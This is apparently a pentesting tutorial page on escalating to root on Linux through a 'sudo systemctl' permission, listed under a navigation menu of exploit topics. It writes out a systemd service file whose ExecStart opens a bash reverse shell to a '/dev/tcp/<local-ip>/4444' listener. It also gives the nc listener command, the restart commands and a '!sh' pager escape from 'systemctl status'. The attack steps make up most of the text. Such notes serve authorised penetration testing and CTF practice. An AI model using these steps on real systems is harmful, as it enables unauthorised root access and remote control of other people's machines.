Exploits related to Linux

Privilege Escalation

Ansible Playbook Privilege Escalation

Apache Conf Privilege Escalation

Bash eq Privilege Escalation

Buffer Overflow Privilege Escalation

Chrome Remote Debugger Pentesting

Doas Privilege Escalation

Ghidra Debug Mode RCE

Gnuplot Privilege Escalation

LXC/LXD (Linux Container/Daemon) Privilege Escalation

Linux Privilege Escalation

Mozilla Pentesting

OpenSSL Privilege Escalation

Pip Download Code Execution

PolKit Privilege Escalation

Python Eval Code Execution

Python Jails Escape

Python Privilege Escalation

Python Yaml Privilege Escalation

Ruby Privilege Escalation

Rust Privilege Escalation

SSSD Privilege Escalation

Shared Library Hijacking

Snapd Privilege Escalation

Sudo ClamAV Privilege Escalation

Sudo Dstat Privilege Escalation

Sudo Exiftool Privilege Escalation

Sudo Fail2ban Privilege Escalation

Sudo Git Privilege Escalation

Sudo Java Privilege Escalation

Sudo OpenVPN Privilege Escalation

Sudo Path Traversal Privilege Escalation

Sudo Privilege Escalation

Sudo Privilege Escalation by Overriding Shared Library

Sudo Reboot Privilege Escalation

Sudo Screen Privilege Escalation

Sudo Service Privilege Escalation

Sudo Shutdown, Poweroff Privilege Escalation

Sudo Systemctl Privilege Escalation

Sudo Tee Privilege Escalation

Sudo Umount Privilege Escalation

Sudo Vim Privilege Escalation

Sudo Wall Privilege Escalation

Sudo Wget Privilege Escalation

Sudoedit Privilege Escalation

Tar Wildcard Injection PrivEsc

Update-Motd Privilege Escalation

irb (Interactive Ruby Shell) Privilege Escalation

Post Exploitation

Linux Backdoors

Linux Pivoting

Backup

BorgBackup Pentesting

Container

LXC/LXD (Linux Container/Daemon) Privilege Escalation

Archive

7z

Bzip2 & Bunzip2

Crack Zip Password

Gzip & Gunzip

Tar

Zip & Unzip

Attack

Fork Bomb

Others

Linux Techniques

Linux Troubleshooting

Linux User & File Management

X11 (X Window System) Pentesting

Sudo Systemctl Privilege Escalation

Last modified: 2023-07-12

Privilege Escalation

sudo systemctl is vulnerable to privilege escalation by modifying the configuration file.

Modify Configurations

sudo -l

(ALL) NOPASSWD: systemctl

If we can run "systemctl" command as root, and we can edit the config file, then we might be a root user.

1. Update the Config File

We need to insert the payload for reverse shell to get a root shell into the /etc/systemd/system/example.service.

[Unit]
This is an example service.

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/<local-ip>/4444 0>&1'

[Install]
WantedBy=multi-user.target

Replace “<local-ip>” with your local ip address.

2. Start Listener in Local Machine

Then start listener for getting a root shell.

nc -lvnp 4444

3. Restart the Service

Reload the daemon and restart.

sudo systemctl daemon-reload
sudo systemctl restart example.service

Now we should get a shell in local machine.

sudo -l

# output
(ALL) NOPASSWD: systemctl status example.service

If we can execute systemctl status as root, we can spawn another shell in the pager.
Just run the command with sudo.

sudo systemctl status example.service

Then enter the following command in the pager like less.

!sh

Spawning the shell, then we can get another user shell.

References

https://gtfobins.github.io/gtfobins/systemctl/

Tools by HDKS

Automatic web fuzzer.

Auto reconnaissance CLI.

Hash identifier.